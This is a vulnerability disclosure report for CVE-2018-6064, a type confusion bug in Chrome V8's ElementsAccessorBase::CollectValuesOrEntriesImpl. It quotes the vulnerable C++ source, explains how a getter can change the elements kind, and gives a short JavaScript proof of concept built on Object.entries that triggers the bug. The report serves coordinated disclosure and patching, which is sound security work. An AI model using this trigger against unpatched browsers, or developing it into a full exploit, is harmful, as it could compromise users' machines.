Chrome V8 suffers from a type confusion vulnerability in ElementsAccessorBase::CollectValuesOrEntriesImpl.
e92050fc25960e3ebedf1862a29f2346
Chrome: V8: Type confusion in ElementsAccessorBase::CollectValuesOrEntriesImpl
CVE-2018-6064
Here's a snippet of the method.
<a href="https://cs.chromium.org/chromium/src/v8/src/elements.cc?rcl=3cbf26e8a21aa76703d2c3c51adb9c96119500da&l=1051" title="" class="" rel="nofollow">https://cs.chromium.org/chromium/src/v8/src/elements.cc?rcl=3cbf26e8a21aa76703d2c3c51adb9c96119500da&l=1051</a>
static Maybe<bool> CollectValuesOrEntriesImpl(
Isolate* isolate, Handle<JSObject> object,
Handle<FixedArray> values_or_entries, bool get_entries, int* nof_items,
PropertyFilter filter) {
...
for (int i = 0; i < keys->length(); ++i) {
Handle<Object> key(keys->get(i), isolate);
Handle<Object> value;
uint32_t index;
if (!key->ToUint32(&index)) continue;
uint32_t entry = Subclass::GetEntryForIndexImpl(
isolate, *object, object->elements(), index, filter);
if (entry == kMaxUInt32) continue;
PropertyDetails details = Subclass::GetDetailsImpl(*object, entry);
if (details.kind() == kData) {
value = Subclass::GetImpl(isolate, object->elements(), entry);
} else {
LookupIterator it(isolate, object, index, LookupIterator::OWN);
ASSIGN_RETURN_ON_EXCEPTION_VALUE(
isolate, value, Object::GetProperty(&it), Nothing<bool>()); <<------- (a)
}
if (get_entries) {
value = MakeEntryPair(isolate, index, value);
}
values_or_entries->set(count++, *value);
}
*nof_items = count;
return Just(true);
}
At (a), the elements kind can be changed by getters. This will lead to type confusion in GetEntryForIndexImpl.
PoC:
let arr = [];
arr[1000] = 0x1234;
arr.__defineGetter__(256, function () {
delete arr[256];
arr.unshift(1.1);
arr.length = 0;
});
Object.entries(arr).toString();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt